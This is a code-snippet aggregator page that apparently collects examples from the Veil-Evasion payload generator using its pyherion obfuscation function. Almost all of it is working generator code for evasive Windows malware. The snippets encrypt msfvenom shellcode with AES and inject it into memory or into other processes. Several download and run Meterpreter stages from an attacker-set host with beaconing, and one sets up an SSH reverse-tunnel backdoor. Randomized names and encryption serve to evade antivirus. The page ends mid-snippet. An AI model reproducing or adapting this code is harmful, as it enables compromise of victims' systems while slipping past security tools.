本文整理汇总了Python中modules.common.encryption.pyherion函数的典型用法代码示例。如果您正苦于以下问题:Python pyherion函数的具体用法?Python pyherion怎么用?Python pyherion使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。
在下文中一共展示了pyherion函数的15个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Python代码示例。
示例1: generate
def generate(self):
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# build our your payload sourcecode
PayloadCode = "..."
# add in a randomized string
PayloadCode += helpers.randomString()
# example of how to check the internal options
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
# return everything
return PayloadCode示例2: generate
def generate(self):
self._validateArchitecture()
PYTHON_SOURCE = self.required_options["PYTHON_SOURCE"][0]
try:
# read in the python source
f = open(PYTHON_SOURCE, 'r')
PayloadCode = f.read()
f.close()
except IOError:
print helpers.color("\n [!] PYTHON_SOURCE file \""+PYTHON_SOURCE+"\" not found\n", warning=True)
return ""
# example of how to check the internal options
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
# return everything
return PayloadCode示例3: generate
def generate(self):
self._validateArchitecture()
python_source = self.required_options["python_source"][0]
try:
# read in the python source
f = open(python_source, 'r')
PayloadCode = f.read()
f.close()
except IOError:
print helpers.color("\n [!] python_source file \""+python_source+"\" not found\n", warning=True)
return ""
# example of how to check the internal options
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
# return everything
return PayloadCode示例4: generate
def generate(self):
if self.required_options["inject_method"][0].lower() == "virtual":
if self.required_options["expire_payload"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandDecodeAES = helpers.randomString()
RandCipherObject = helpers.randomString()
RandDecodedShellcode = helpers.randomString()
RandShellCode = helpers.randomString()
RandPadding = helpers.randomString()
# encrypt the shellcode and grab the randomized key
(EncodedShellcode, secret) = encryption.encryptAES(Shellcode)
# Create Payload code
PayloadCode = "import ctypes\n"
PayloadCode += "from Crypto.Cipher import AES\n"
PayloadCode += "import base64\n"
PayloadCode += "import os\n"
PayloadCode += RandPadding + " = '{'\n"
PayloadCode += (
RandDecodeAES + " = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(" + RandPadding + ")\n"
)
PayloadCode += RandCipherObject + " = AES.new('" + secret + "')\n"
PayloadCode += (
RandDecodedShellcode
+ " = "
+ RandDecodeAES
+ "("
+ RandCipherObject
+ ", '"
+ EncodedShellcode
+ "')\n"
)
PayloadCode += RandShellCode + " = bytearray(" + RandDecodedShellcode + '.decode("string_escape"))\n'
PayloadCode += (
RandPtr
+ " = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len("
+ RandShellCode
+ ")),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n"
)
PayloadCode += (
RandBuf + " = (ctypes.c_char * len(" + RandShellCode + ")).from_buffer(" + RandShellCode + ")\n"
)
PayloadCode += (
"ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int("
+ RandPtr
+ "),"
+ RandBuf
+ ",ctypes.c_int(len("
+ RandShellCode
+ ")))\n"
)
PayloadCode += (
RandHt
+ " = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int("
+ RandPtr
+ "),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n"
)
PayloadCode += (
"ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(" + RandHt + "),ctypes.c_int(-1))\n"
)
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandDecodeAES = helpers.randomString()
RandCipherObject = helpers.randomString()
RandDecodedShellcode = helpers.randomString()
RandShellCode = helpers.randomString()
RandPadding = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# encrypt the shellcode and grab the randomized key
(EncodedShellcode, secret) = encryption.encryptAES(Shellcode)
#.........这里部分代码省略.........
示例5: generate
def generate(self):
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
pid_num_variable = helpers.randomString()
pagerwx_variable = helpers.randomString()
processall_variable = helpers.randomString()
memcommit_variable = helpers.randomString()
shell_length_variable = helpers.randomString()
memalloc_variable = helpers.randomString()
prochandle_variable = helpers.randomString()
kernel32_variable = helpers.randomString()
# Create Payload code
PayloadCode = 'from ctypes import *\n\n'
PayloadCode += pagerwx_variable + ' = 0x40\n'
PayloadCode += processall_variable + ' = 0x1F0FFF\n'
PayloadCode += memcommit_variable + ' = 0x00001000\n'
PayloadCode += kernel32_variable + ' = windll.kernel32\n'
PayloadCode += ShellcodeVariableName + ' = \"' + Shellcode + '\"\n'
PayloadCode += pid_num_variable + ' = ' + self.required_options["PID_NUMBER"][0] +'\n'
PayloadCode += shell_length_variable + ' = len(' + ShellcodeVariableName + ')\n\n'
PayloadCode += prochandle_variable + ' = ' + kernel32_variable + '.OpenProcess(' + processall_variable + ', False, ' + pid_num_variable + ')\n'
PayloadCode += memalloc_variable + ' = ' + kernel32_variable + '.VirtualAllocEx(' + prochandle_variable + ', 0, ' + shell_length_variable + ', ' + memcommit_variable + ', ' + pagerwx_variable + ')\n'
PayloadCode += kernel32_variable + '.WriteProcessMemory(' + prochandle_variable + ', ' + memalloc_variable + ', ' + ShellcodeVariableName + ', ' + shell_length_variable + ', 0)\n'
PayloadCode += kernel32_variable + '.CreateRemoteThread(' + prochandle_variable + ', None, 0, ' + memalloc_variable + ', 0, 0, 0)\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
pid_num_variable = helpers.randomString()
pagerwx_variable = helpers.randomString()
processall_variable = helpers.randomString()
memcommit_variable = helpers.randomString()
shell_length_variable = helpers.randomString()
memalloc_variable = helpers.randomString()
prochandle_variable = helpers.randomString()
kernel32_variable = helpers.randomString()
# Create Payload code
PayloadCode = 'from ctypes import *\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += pagerwx_variable + ' = 0x40\n'
PayloadCode += processall_variable + ' = 0x1F0FFF\n'
PayloadCode += memcommit_variable + ' = 0x00001000\n'
PayloadCode += kernel32_variable + ' = windll.kernel32\n'
PayloadCode += ShellcodeVariableName + ' = \"' + Shellcode + '\"\n'
PayloadCode += pid_num_variable + ' = ' + self.required_options["PID_NUMBER"][0] +'\n'
PayloadCode += shell_length_variable + ' = len(' + ShellcodeVariableName + ')\n\n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + prochandle_variable + ' = ' + kernel32_variable + '.OpenProcess(' + processall_variable + ', False, ' + pid_num_variable + ')\n'
PayloadCode += '\t' + memalloc_variable + ' = ' + kernel32_variable + '.VirtualAllocEx(' + prochandle_variable + ', 0, ' + shell_length_variable + ', ' + memcommit_variable + ', ' + pagerwx_variable + ')\n'
PayloadCode += '\t' + kernel32_variable + '.WriteProcessMemory(' + prochandle_variable + ', ' + memalloc_variable + ', ' + ShellcodeVariableName + ', ' + shell_length_variable + ', 0)\n'
PayloadCode += '\t' + kernel32_variable + '.CreateRemoteThread(' + prochandle_variable + ', None, 0, ' + memalloc_variable + ', 0, 0, 0)\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode示例6: generate
def generate(self):
imports = "import sys; import urllib2; import ctypes; import time; import signal; import threading\n"
inject_func = helpers.randomString()
getexec_func = helpers.randomString()
main_func = helpers.randomString()
beaconthr_func = helpers.randomString()
retry_var = helpers.randomString()
if self.required_options["BEACON"][0].lower() == 'n':
global_vars = "%s = False" % retry_var
elif self.required_options["BEACON"][0].lower() == 'y':
global_vars = "%s = True" % retry_var
interval_var = helpers.randomString()
opener_var = helpers.randomString()
global_vars += "\n%s = %s" % (interval_var, self.required_options["BEACON_SECONDS"][0])
global_vars += "\n%s = urllib2.build_opener()\n" % (opener_var)
shellcode_var = helpers.randomString()
ptr_var = helpers.randomString()
ht_var = helpers.randomString()
buff_var = helpers.randomString()
inject = "def %s(%s):" % (inject_func, shellcode_var)
inject += "\n\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))" % (ptr_var, shellcode_var)
inject += "\n\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))" % (ptr_var, shellcode_var)
inject += "\n\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)" % (buff_var, shellcode_var, shellcode_var)
inject += "\n\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))" % (ptr_var, buff_var, shellcode_var)
inject += "\n\t%s = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))" % (ht_var, ptr_var)
inject += "\n\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(%s),ctypes.c_int(-1))\n" % ht_var
url_var = helpers.randomString()
shellcode_var = helpers.randomString()
info_var = helpers.randomString()
thread_var = helpers.randomString()
thread_name = helpers.randomString()
thread_name2 = helpers.randomString()
getexec = "def %s(%s):" % (getexec_func, url_var)
getexec += "\n\ttry:"
getexec += "\n\t\t%s = %s.open(%s)" % (info_var, opener_var, url_var)
getexec += "\n\t\t%s = %s.read()" % (shellcode_var, info_var)
getexec += "\n\t\t%s = bytearray(%s)" % (shellcode_var, shellcode_var)
getexec += "\n\t\t%s(%s)" % (inject_func, shellcode_var)
getexec += "\n\texcept Exception:"
getexec += "\n\t\tpass\n"
url_var = helpers.randomString()
beaconthr = "def %s(%s):" % (beaconthr_func, url_var)
beaconthr += "\n\twhile True:"
beaconthr += "\n\t\ttime.sleep(%s)" % interval_var
beaconthr += "\n\t\t%s = threading.Thread(name='%s', target=%s, args=(%s,))" % (thread_var, thread_name, getexec_func, url_var)
beaconthr += "\n\t\t%s.setDaemon(True)" % thread_var
beaconthr += "\n\t\t%s.start()\n" % thread_var
main = "def %s():" % main_func
main += "\n\t%s = 'http://%s:%s/%s'" % (url_var, self.required_options['DOWNLOAD_HOST'][0], self.required_options['DOWNLOAD_PORT'][0], self.required_options['DOWNLOAD_NAME'][0])
main += "\n\tif %s is True:" % retry_var
main += "\n\t\t%s = threading.Thread(name='%s', target=%s, args=(%s,))" % (thread_var, thread_name, beaconthr_func, url_var)
main += "\n\t\t%s.setDaemon(True)" % thread_var
main += "\n\t\t%s.start()" % thread_var
main += "\n\t%s(%s)" % (getexec_func, url_var)
if self.required_options["BEACON"][0].lower() == 'y':
main += "\n\twhile True:"
main += "\n\t\ttime.sleep(0.1)"
main += "\nif __name__ == '__main__':"
main += "\n\t%s()" % main_func
PayloadCode = imports + global_vars + inject + getexec + beaconthr + main
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode示例7: generate
#.........这里部分代码省略.........
import thread
import threading
import select
def inject(shellcode):
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
ctypes.c_int(len(shellcode)))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
def handler(chan, host, port):
sock = socket()
try:
sock.connect((host, port))
except Exception:
pass
while True:
r, w, x = select.select([sock, chan], [], [])
if sock in r:
data = sock.recv(1024)
if len(data) == 0:
break
chan.send(data)
if chan in r:
data = chan.recv(1024)
if len(data) == 0:
break
sock.send(data)
chan.close()
sock.close()
def reverse_forward_tunnel(server_port, remote_host, remote_port, transport):
transport.request_port_forward('', server_port)
while True:
chan = transport.accept(1000)
if chan is None:
continue
thr = threading.Thread(target=handler, args=(chan, remote_host, remote_port))
thr.setDaemon(True)
thr.start()
def main(user,password, rhost, port, shellport):
server = [rhost, int(port)]
remote = ['127.0.0.1', int(shellport)]
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
client.connect(server[0], server[1], username=user, key_filename=None, look_for_keys=False, password=password)
except Exception:
pass
try:
reverse_forward_tunnel(int(shellport), remote[0], remote[1], client.get_transport())
except Exception:
pass
if __name__ == '__main__':
multiprocessing.freeze_support()
shellcode = r"%s"
shellcode = shellcode.decode("string_escape")
shellcode = bytearray(shellcode)
shellport = "%s"
time.sleep(2)
p = multiprocessing.Process(target=inject, args=(shellcode,))
jobs = []
jobs.append(p)
p.start()
user = "%s"
password = "%s"
rhost = "%s"
port = "%s"
time.sleep(3)
thread.start_new_thread(main,(user, password, rhost, port, shellport))""" % (Shellcode,
self.required_options["LPORT"][0],
self.required_options["SSHUSER"][0],
self.required_options["SSHPASS"][0],
self.required_options["SSHOST"][0],
self.required_options["SSHPORT"][0])
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode示例8: generate
def generate(self):
payloadCode = "import urllib2, string, random, struct, ctypes, httplib, time\n"
# randomize everything, yo'
sumMethodName = helpers.randomString()
checkinMethodName = helpers.randomString()
randLettersName = helpers.randomString()
randLetterSubName = helpers.randomString()
randBaseName = helpers.randomString()
downloadMethodName = helpers.randomString()
hostName = helpers.randomString()
portName = helpers.randomString()
requestName = helpers.randomString()
tName = helpers.randomString()
injectMethodName = helpers.randomString()
dataName = helpers.randomString()
byteArrayName = helpers.randomString()
ptrName = helpers.randomString()
bufName = helpers.randomString()
handleName = helpers.randomString()
data2Name = helpers.randomString()
proxy_var = helpers.randomString()
opener_var = helpers.randomString()
# helper method that returns the sum of all ord values in a string % 0x100
payloadCode += "def %s(s): return sum([ord(ch) for ch in s]) %% 0x100\n" %(sumMethodName)
# method that generates a new checksum value for checkin to the meterpreter handler
payloadCode += "def %s():\n\tfor x in xrange(64):\n" %(checkinMethodName)
payloadCode += "\t\t%s = ''.join(random.sample(string.ascii_letters + string.digits,3))\n" %(randBaseName)
payloadCode += "\t\t%s = ''.join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))\n" %(randLettersName)
payloadCode += "\t\tfor %s in %s:\n" %(randLetterSubName, randLettersName)
payloadCode += "\t\t\tif %s(%s + %s) == 92: return %s + %s\n" %(sumMethodName, randBaseName, randLetterSubName, randBaseName, randLetterSubName)
# method that connects to a host/port over https and downloads the hosted data
payloadCode += "def %s(%s,%s):\n" %(downloadMethodName, hostName, portName)
payloadCode += "\t" + proxy_var + " = urllib2.ProxyHandler()\n"
payloadCode += "\t" + opener_var + " = urllib2.build_opener(" + proxy_var + ")\n"
payloadCode += "\turllib2.install_opener(" + opener_var + ")\n"
payloadCode += "\t%s = urllib2.Request(\"https://%%s:%%s/%%s\" %%(%s,%s,%s()), None, {'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'})\n" %(requestName, hostName, portName, checkinMethodName)
payloadCode += "\ttry:\n"
payloadCode += "\t\t%s = urllib2.urlopen(%s)\n" %(tName, requestName)
payloadCode += "\t\ttry:\n"
payloadCode += "\t\t\tif int(%s.info()[\"Content-Length\"]) > 100000: return %s.read()\n" %(tName, tName)
payloadCode += "\t\t\telse: return ''\n"
payloadCode += "\t\texcept: return %s.read()\n" % (tName)
payloadCode += "\texcept urllib2.URLError, e: return ''\n"
# method to inject a reflective .dll into memory
payloadCode += "def %s(%s):\n" %(injectMethodName, dataName)
payloadCode += "\tif %s != \"\":\n" %(dataName)
payloadCode += "\t\t%s = bytearray(%s)\n" %(byteArrayName, dataName)
payloadCode += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)), ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" %(ptrName, byteArrayName)
payloadCode += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" %(bufName, byteArrayName, byteArrayName)
payloadCode += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s),%s, ctypes.c_int(len(%s)))\n" %(ptrName, bufName, byteArrayName)
payloadCode += "\t\t%s = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" %(handleName, ptrName)
payloadCode += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(%s),ctypes.c_int(-1))\n" %(handleName)
# download the metpreter .dll and inject it
payloadCode += "%s = ''\n" %(data2Name)
payloadCode += "%s = %s(\"%s\", %s)\n" %(data2Name, downloadMethodName, self.required_options["LHOST"][0], self.required_options["LPORT"][0])
payloadCode += "%s(%s)\n" %(injectMethodName, data2Name)
if self.required_options["USE_PYHERION"][0].lower() == "y":
payloadCode = encryption.pyherion(payloadCode)
return payloadCode示例9: generate
def generate(self):
if os.path.exists(settings.METASPLOIT_PATH + "/vendor/bundle/ruby/1.9.1/gems/meterpreter_bins-0.0.10/meterpreter/metsrv.x86.dll"):
metsrvPath = settings.METASPLOIT_PATH + "/vendor/bundle/ruby/1.9.1/gems/meterpreter_bins-0.0.10/meterpreter/metsrv.x86.dll"
else:
print "[*] Error: You either do not have the latest version of Metasploit or"
print "[*] Error: do not have your METASPLOIT_PATH set correctly in your settings file."
print "[*] Error: Please fix either issue then select this payload again!"
sys.exit()
f = open(metsrvPath, 'rb')
meterpreterDll = f.read()
f.close()
# lambda function used for patching the metsvc.dll
dllReplace = lambda dll,ind,s: dll[:ind] + s + dll[ind+len(s):]
# patch the metsrv.dll header
headerPatch = helpers.selfcontained_patch()
meterpreterDll = dllReplace(meterpreterDll,0,headerPatch)
# patch in the default user agent string
userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
meterpreterDll = dllReplace(meterpreterDll,userAgentIndex,userAgentString)
# turn off SSL
sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
sslString = "METERPRETER_TRANSPORT_HTTP\x00"
meterpreterDll = dllReplace(meterpreterDll,sslIndex,sslString)
# replace the URL/port of the handler
urlIndex = meterpreterDll.index("https://" + ("X" * 256))
urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum() + "_" + helpers.randomString(16) + "/\x00"
meterpreterDll = dllReplace(meterpreterDll,urlIndex,urlString)
# replace the expiration timeout with the default value of 300
expirationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xb64be661))
expirationTimeout = struct.pack('<I', 604800)
meterpreterDll = dllReplace(meterpreterDll,expirationTimeoutIndex,expirationTimeout)
# replace the communication timeout with the default value of 300
communicationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xaf79257f))
communicationTimeout = struct.pack('<I', 300)
meterpreterDll = dllReplace(meterpreterDll,communicationTimeoutIndex,communicationTimeout)
# compress/base64 encode the dll
compressedDll = helpers.deflate(meterpreterDll)
# actually build out the payload
payloadCode = ""
# traditional void pointer injection
if self.required_options["inject_method"][0].lower() == "void":
# doing void * cast
payloadCode += "from ctypes import *\nimport base64,zlib\n"
randInflateFuncName = helpers.randomString()
randb64stringName = helpers.randomString()
randVarName = helpers.randomString()
# deflate function
payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"
randVarName = helpers.randomString()
randFuncName = helpers.randomString()
payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
payloadCode += randFuncName+"()\n"
# VirtualAlloc() injection
else:
payloadCode += 'import ctypes,base64,zlib\n'
randInflateFuncName = helpers.randomString()
randb64stringName = helpers.randomString()
randVarName = helpers.randomString()
randPtr = helpers.randomString()
randBuf = helpers.randomString()
randHt = helpers.randomString()
# deflate function
payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"
payloadCode += randVarName + " = bytearray(" + randInflateFuncName + "(\"" + compressedDll + "\"))\n"
payloadCode += randPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ randVarName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
payloadCode += randBuf + ' = (ctypes.c_char * len(' + randVarName + ')).from_buffer(' + randVarName + ')\n'
payloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + randPtr + '),' + randBuf + ',ctypes.c_int(len(' + randVarName + ')))\n'
payloadCode += randHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + randPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
payloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + randHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
#.........这里部分代码省略.........
示例10: generate
def generate(self):
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandDecodeAES = helpers.randomString()
RandCipherObject = helpers.randomString()
RandDecodedShellcode = helpers.randomString()
RandShellCode = helpers.randomString()
RandPadding = helpers.randomString()
known_plaintext_string = helpers.randomString()
plaintext_string_variable = helpers.randomString()
key_guess = helpers.randomString()
secret_key = helpers.randomString()
small_constrained_key_variable = helpers.randomString()
# encrypt the shellcode and grab the randomized key
(EncodedShellcode, partial_key, secret) = encryption.constrainedAES(Shellcode)
# Use the secret we received earlier to encrypt our known plaintext string
encrypted_plaintext_string = encryption.knownPlaintext(secret, known_plaintext_string)
# Create Payload code
PayloadCode = 'import ctypes\n'
PayloadCode += 'from Crypto.Cipher import AES\n'
PayloadCode += 'import base64\n'
PayloadCode += 'import os\n'
PayloadCode += small_constrained_key_variable + ' = \'' + partial_key + '\'\n'
PayloadCode += RandPadding + ' = \'{\'\n'
PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
PayloadCode += 'for ' + key_guess + ' in range(100000, 1000000):\n'
PayloadCode += '\t' + secret_key + " = " + small_constrained_key_variable + ' + str(' + key_guess + ')\n'
PayloadCode += '\t' + RandCipherObject + ' = AES.new(' + secret_key + ')\n'
PayloadCode += '\t' + plaintext_string_variable + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + encrypted_plaintext_string + '\')\n'
PayloadCode += '\tif ' + plaintext_string_variable + ' == \'' + known_plaintext_string + '\':\n'
PayloadCode += '\t\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
PayloadCode += '\t\t' + RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
PayloadCode += '\t\t' + RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += '\t\t' + RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n'
PayloadCode += '\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n'
PayloadCode += '\t\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += '\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandDecodeAES = helpers.randomString()
RandCipherObject = helpers.randomString()
RandDecodedShellcode = helpers.randomString()
RandShellCode = helpers.randomString()
RandPadding = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
known_plaintext_string = helpers.randomString()
plaintext_string_variable = helpers.randomString()
key_guess = helpers.randomString()
secret_key = helpers.randomString()
small_constrained_key_variable = helpers.randomString()
# encrypt the shellcode and grab the randomized key
(EncodedShellcode, partial_key, secret) = encryption.constrainedAES(Shellcode)
# Use the secret we received earlier to encrypt our known plaintext string
encrypted_plaintext_string = encryption.knownPlaintext(secret, known_plaintext_string)
# Create Payload code
PayloadCode = 'import ctypes\n'
PayloadCode += 'from Crypto.Cipher import AES\n'
PayloadCode += 'import base64\n'
PayloadCode += 'import os\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + small_constrained_key_variable + ' = \'' + partial_key + '\'\n'
PayloadCode += '\t' + RandPadding + ' = \'{\'\n'
#.........这里部分代码省略.........
示例11: generate
def generate(self):
payloadCode = "import urllib2, string, random, struct, ctypes, httplib, time\n"
# randomize everything, yo'
sumMethodName = helpers.randomString()
checkinMethodName = helpers.randomString()
randLettersName = helpers.randomString()
randLetterSubName = helpers.randomString()
randBaseName = helpers.randomString()
downloadMethodName = helpers.randomString()
hostName = helpers.randomString()
portName = helpers.randomString()
requestName = helpers.randomString()
responseName = helpers.randomString()
injectMethodName = helpers.randomString()
dataName = helpers.randomString()
byteArrayName = helpers.randomString()
ptrName = helpers.randomString()
bufName = helpers.randomString()
handleName = helpers.randomString()
data2Name = helpers.randomString()
# helper method that returns the sum of all ord values in a string % 0x100
payloadCode += "def %s(s): return sum([ord(ch) for ch in s]) %% 0x100\n" %(sumMethodName)
# method that generates a new checksum value for checkin to the meterpreter handler
payloadCode += "def %s():\n\tfor x in xrange(64):\n" %(checkinMethodName)
payloadCode += "\t\t%s = ''.join(random.sample(string.ascii_letters + string.digits,3))\n" %(randBaseName)
payloadCode += "\t\t%s = ''.join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))\n" %(randLettersName)
payloadCode += "\t\tfor %s in %s:\n" %(randLetterSubName, randLettersName)
payloadCode += "\t\t\tif %s(%s + %s) == 92: return %s + %s\n" %(sumMethodName, randBaseName, randLetterSubName, randBaseName, randLetterSubName)
# method that connects to a host/port over https and downloads the hosted data
payloadCode += "def %s(%s,%s):\n" %(downloadMethodName, hostName, portName)
payloadCode += "\t%s = httplib.HTTPSConnection(%s, %s)\n" %(requestName, hostName, portName)
payloadCode += "\t%s.request(\"GET\", \"/\" + %s() )\n" %(requestName, checkinMethodName)
payloadCode += "\t%s = %s.getresponse()\n" %(responseName, requestName)
